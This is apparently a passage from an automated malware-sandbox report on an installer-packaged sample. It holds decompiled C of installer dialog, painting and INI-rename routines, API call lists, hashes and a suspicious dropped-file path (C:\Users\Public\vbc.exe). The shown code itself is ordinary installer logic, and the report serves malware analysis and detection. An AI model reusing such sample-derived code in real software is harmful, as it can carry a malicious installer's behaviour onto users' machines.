                                                                                                                                                                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403F94
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00403FE5
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 0040408B
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 004040AC
                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 004040BE
                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 004040D9
                                                                                                                                                                                                          • GetSystemMenu.USER32 ref: 004040EF
                                                                                                                                                                                                          • EnableMenuItem.USER32 ref: 004040F6
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0040410E
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404121
                                                                                                                                                                                                          • lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040428E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 184305955-0
                                                                                                                                                                                                          • Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                                                                                                                                          • Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040443C, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                          			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429884 =  *0x429884 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404338(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3e0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								_t40 =  &_v8; // 0x42e3e0
								E004046E0(_a4,  *_t40);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f448, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f448, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a090 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004046BC();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ec1c; // 0x590f48
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f498;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00404407;
				E004042D1(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E004042D1(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00404306(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f454 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x429884 = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429884 = 0;
				return 0;
			}


















                                                                                                                                                                                                          0x0040444c
                                                                                                                                                                                                          0x00404571
                                                                                                                                                                                                          0x004045cd
                                                                                                                                                                                                          0x004045d1
                                                                                                                                                                                                          0x0040469e
                                                                                                                                                                                                          0x004046a0
                                                                                                                                                                                                          0x004046a0
                                                                                                                                                                                                          0x004046a6
                                                                                                                                                                                                          0x004046a6
                                                                                                                                                                                                          0x004046a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004046b0
                                                                                                                                                                                                          0x004045df
                                                                                                                                                                                                          0x004045e1
                                                                                                                                                                                                          0x004045eb
                                                                                                                                                                                                          0x004045f6
                                                                                                                                                                                                          0x004045f9
                                                                                                                                                                                                          0x004045fc
                                                                                                                                                                                                          0x00404607
                                                                                                                                                                                                          0x0040460a
                                                                                                                                                                                                          0x00404611
                                                                                                                                                                                                          0x0040461f
                                                                                                                                                                                                          0x00404637
                                                                                                                                                                                                          0x00404639
                                                                                                                                                                                                          0x0040463b
                                                                                                                                                                                                          0x00404641
                                                                                                                                                                                                          0x00404650
                                                                                                                                                                                                          0x00404652
                                                                                                                                                                                                          0x00404652
                                                                                                                                                                                                          0x00404611
                                                                                                                                                                                                          0x0040465c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404667
                                                                                                                                                                                                          0x0040466b
                                                                                                                                                                                                          0x0040467c
                                                                                                                                                                                                          0x0040467c
                                                                                                                                                                                                          0x00404682
                                                                                                                                                                                                          0x00404690
                                                                                                                                                                                                          0x00404690
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404694
                                                                                                                                                                                                          0x0040465c
                                                                                                                                                                                                          0x0040457c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404590
                                                                                                                                                                                                          0x00404596
                                                                                                                                                                                                          0x0040459c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004045c1
                                                                                                                                                                                                          0x004045c3
                                                                                                                                                                                                          0x004045c8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004045c8
                                                                                                                                                                                                          0x0040457c
                                                                                                                                                                                                          0x00404452
                                                                                                                                                                                                          0x00404455
                                                                                                                                                                                                          0x0040445a
                                                                                                                                                                                                          0x0040445c
                                                                                                                                                                                                          0x0040446b
                                                                                                                                                                                                          0x0040446b
                                                                                                                                                                                                          0x00404472
                                                                                                                                                                                                          0x00404475
                                                                                                                                                                                                          0x00404477
                                                                                                                                                                                                          0x0040447c
                                                                                                                                                                                                          0x00404485
                                                                                                                                                                                                          0x0040448b
                                                                                                                                                                                                          0x00404497
                                                                                                                                                                                                          0x0040449a
                                                                                                                                                                                                          0x004044a3
                                                                                                                                                                                                          0x004044a8
                                                                                                                                                                                                          0x004044ab
                                                                                                                                                                                                          0x004044b0
                                                                                                                                                                                                          0x004044c7
                                                                                                                                                                                                          0x004044ce
                                                                                                                                                                                                          0x004044e1
                                                                                                                                                                                                          0x004044e4
                                                                                                                                                                                                          0x004044f9
                                                                                                                                                                                                          0x00404500
                                                                                                                                                                                                          0x00404505
                                                                                                                                                                                                          0x0040450a
                                                                                                                                                                                                          0x0040450a
                                                                                                                                                                                                          0x00404519
                                                                                                                                                                                                          0x00404528
                                                                                                                                                                                                          0x0040453a
                                                                                                                                                                                                          0x0040453f
                                                                                                                                                                                                          0x0040454f
                                                                                                                                                                                                          0x00404551
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                          • String ID: N$B
                                                                                                                                                                                                          • API String ID: 3103080414-4074832742
                                                                                                                                                                                                          • Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                                                                                                                                          • Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f454;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                                                                                                                                          0x0040100a
                                                                                                                                                                                                          0x00401039
                                                                                                                                                                                                          0x00401047
                                                                                                                                                                                                          0x0040104d
                                                                                                                                                                                                          0x00401051
                                                                                                                                                                                                          0x0040105b
                                                                                                                                                                                                          0x00401061
                                                                                                                                                                                                          0x00401064
                                                                                                                                                                                                          0x004010f3
                                                                                                                                                                                                          0x00401089
                                                                                                                                                                                                          0x0040108c
                                                                                                                                                                                                          0x004010a6
                                                                                                                                                                                                          0x004010bd
                                                                                                                                                                                                          0x004010cc
                                                                                                                                                                                                          0x004010cf
                                                                                                                                                                                                          0x004010d5
                                                                                                                                                                                                          0x004010d9
                                                                                                                                                                                                          0x004010e4
                                                                                                                                                                                                          0x004010ed
                                                                                                                                                                                                          0x004010ef
                                                                                                                                                                                                          0x004010ef
                                                                                                                                                                                                          0x00401100
                                                                                                                                                                                                          0x00401105
                                                                                                                                                                                                          0x0040110d
                                                                                                                                                                                                          0x00401110
                                                                                                                                                                                                          0x00401112
                                                                                                                                                                                                          0x00401118
                                                                                                                                                                                                          0x0040111f
                                                                                                                                                                                                          0x00401126
                                                                                                                                                                                                          0x00401130
                                                                                                                                                                                                          0x00401142
                                                                                                                                                                                                          0x00401156
                                                                                                                                                                                                          0x00401160
                                                                                                                                                                                                          0x00401165
                                                                                                                                                                                                          0x00401165
                                                                                                                                                                                                          0x00401110
                                                                                                                                                                                                          0x0040116e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401178
                                                                                                                                                                                                          0x00401010
                                                                                                                                                                                                          0x00401013
                                                                                                                                                                                                          0x00401015
                                                                                                                                                                                                          0x0040101f
                                                                                                                                                                                                          0x0040101f
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                          • GetClientRect.USER32 ref: 0040105B
                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                          • DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                          • String ID: F$Setup Setup
                                                                                                                                                                                                          • API String ID: 941294808-1602013819
                                                                                                                                                                                                          • Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                                                                                                                                          • Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405EBC, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405EBC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c648 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
						_t53 = _t52 + 0x10;
						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405DA1(_t24 + _t46, 0x42c248, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E8D(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DE6(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                                                                                                                                          0x00405ebc
                                                                                                                                                                                                          0x00405ec5
                                                                                                                                                                                                          0x00405ecc
                                                                                                                                                                                                          0x00405ee0
                                                                                                                                                                                                          0x00405f08
                                                                                                                                                                                                          0x00405f13
                                                                                                                                                                                                          0x00405f17
                                                                                                                                                                                                          0x00405f37
                                                                                                                                                                                                          0x00405f3e
                                                                                                                                                                                                          0x00405f48
                                                                                                                                                                                                          0x00405f55
                                                                                                                                                                                                          0x00405f5a
                                                                                                                                                                                                          0x00405f5f
                                                                                                                                                                                                          0x00405f63
                                                                                                                                                                                                          0x00405f72
                                                                                                                                                                                                          0x00405f74
                                                                                                                                                                                                          0x00405f81
                                                                                                                                                                                                          0x00405f85
                                                                                                                                                                                                          0x00406020
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405f9b
                                                                                                                                                                                                          0x00405fa8
                                                                                                                                                                                                          0x00405fcc
                                                                                                                                                                                                          0x00405fd0
                                                                                                                                                                                                          0x00405fef
                                                                                                                                                                                                          0x00405ff3
                                                                                                                                                                                                          0x00405ff3
                                                                                                                                                                                                          0x00405ff5
                                                                                                                                                                                                          0x00405ffe
                                                                                                                                                                                                          0x00406009
                                                                                                                                                                                                          0x00406014
                                                                                                                                                                                                          0x0040601a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040601a
                                                                                                                                                                                                          0x00405fd2
                                                                                                                                                                                                          0x00405fd5
                                                                                                                                                                                                          0x00405fe0
                                                                                                                                                                                                          0x00405fdc
                                                                                                                                                                                                          0x00405fde
                                                                                                                                                                                                          0x00405fdf
                                                                                                                                                                                                          0x00405fdf
                                                                                                                                                                                                          0x00405fe7
                                                                                                                                                                                                          0x00405fe9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405fe9
                                                                                                                                                                                                          0x00405fb3
                                                                                                                                                                                                          0x00405fb9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405fb9
                                                                                                                                                                                                          0x00405f85
                                                                                                                                                                                                          0x00405f63
                                                                                                                                                                                                          0x00405ee2
                                                                                                                                                                                                          0x00405eed
                                                                                                                                                                                                          0x00405ef6
                                                                                                                                                                                                          0x00405efa
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405efa
                                                                                                                                                                                                          0x0040602b

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405EED
                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00405EF6
                                                                                                                                                                                                            • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                                                                                                                                            • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00405F13
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405F31
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
                                                                                                                                                                                                          • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040601A
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00406021
                                                                                                                                                                                                            • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DEA
                                                                                                                                                                                                            • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                          • String ID: %s=%s$[Rename]
                                                                                                                                                                                                          • API String ID: 2171350718-1727408572
                                                                                                                                                                                                          • Opcode ID: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
                                                                                                                                                                                                          • Instruction ID: 93867bad2f833244898b90dcbcfca195f0b3b673d55ab92eabf696d68ffba162
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb1cb4180cb4c9ea78b19c93ed4765593701f1c4a8a9694117d5f32cc93988d7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29310371640B16ABC2306B659D48F6B3A5CDF45758F14003BF942F62C2EA7CE8118AAD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004062E0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                                          			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ec1c; // 0x590f48
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f498;
				_t39 = 0x42e3e0;
				_t90 = 0x42e3e0;
				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
